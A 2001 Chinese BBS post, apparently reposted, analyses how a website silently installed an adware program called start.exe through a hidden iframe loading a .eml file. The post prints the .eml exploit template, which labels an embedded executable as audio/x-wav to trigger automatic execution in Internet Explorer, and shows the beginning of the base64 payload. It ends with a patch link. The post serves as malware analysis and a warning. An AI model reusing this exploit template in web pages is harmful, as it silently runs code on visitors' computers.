荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: jennychan (靓靓的笨猪), 信区: Virus
标 题: 一种危险的木马植入方法(转载)
发信站: 荔园晨风BBS站 (Tue Jul 3 23:08:20 2001), 站内信件
南京大学小百合站 (Sun Jul 1 16:37:32 2001), 站内信件
今天在www.xfocus.net安全论坛上看见有帖子说www.maylu.com登录这个网站后会
自动下载一个start.exe的程序并自动运行。于是上到这个网站上看了一下,
打开IE浏览器:在地址栏中输入:http://www.maylu.com/index.asp
在网页打开的过程中鼠标奇怪的变成沙漏的状态,看来的确是有程序在运行。打开
计算机的任务管理器,可以看到多了一个start.exe的进程。进程对应的文件是
\winnt\system32\start.exe(在我的win2000上是这样)并且start.exe已经将自己
登记在注册表开机启动项中。这样每次开机都会运行start.exe。
start.exe运行后占有系统资源,不断的向外发送数据,用sniffer看了一下,还好
,发送的都是HTTP请求,仔细检查系统也没发现什么其他损害的地方。看来木马并
不是恶意的。
让我感兴趣的是木马是如何下载到浏览主页的用户的计算机上并运行起来的。于是
和teawater一块研究了一下。定制了一下IE的安全级别,将ActiveX支持等都全部
关掉,再浏览网页,还是下载并运行了。看来和ActiveX无关。把IE的安全级别中
文件下载禁止了,再上去,这回不让再下载了。
看来还是看看这程序是如何下载到自己计算机上的,打开问题网页的源代码看了看
,网页代码最后面有这么一句话。
<iframe src=t.eml width=1 height=1>
--
网页中干吗要有.eml文件,这不是邮件的格式吗。在IE浏览器中输入
http://www.maylu.com/t.eml
再看看任务管理器,start.exe进程有回来了,原来问题就在这个文件上。既然问
题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来
鼠标刚点上去,start.exe又被执行了。
用uedit7打开内容看看,内容入下
From: "xxx" <xxxx@xxx.xxx>
To: "xxx" <xxxx@xxx.xxx>
Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
</BODY>
</HTML>
--2--
--1
Content-Type: audio/x-wav;
name="start.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUACAAAAAQ
AAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQAAAAEAAA
AAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHDGAACcAAAAAMAAAHAG
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......(删掉一大节)
--1
后面的不管它,那就是start.exe经过base64编码的内容。
关键是前面这一段
Content-Type: audio/x-wav;
name="start.exe"
把start.exe的的类型定义为audio/x-wav,这下清楚了,这是利用客户端支持的
MIME(多部分网际邮件扩展,Multipart Internet Mail Extension) 类型的漏洞来
完成的。当申明邮件的类型为audio/x-wav时,IE存在的一个漏洞会将附件认为是
音频文件自动尝试打开,,结果导致邮件文件t.eml中的附件start.exe被执行。在
win2000上,即使是用鼠标点击下载下来的t.eml,或是拷贝粘贴,都会导致t.eml
中的附件被运行,微软的这个漏洞可害人不浅啊。
还好这个start.exe没有什么恶意,只是想利用用户帮自己赚点广告费而已。虽然
这做法有点卑鄙,不过还是可以原谅。话又说回来,要是这里面运行的是一个木马
或者是一个恶意程序的话有如何......。
赶快打补丁吧
http://www.microsoft.com/windows/ie/download/critical/Q290108
我是PPZZ,不要看过来,我会脸红的!
我是笨猪我怕谁!
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.22.146]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店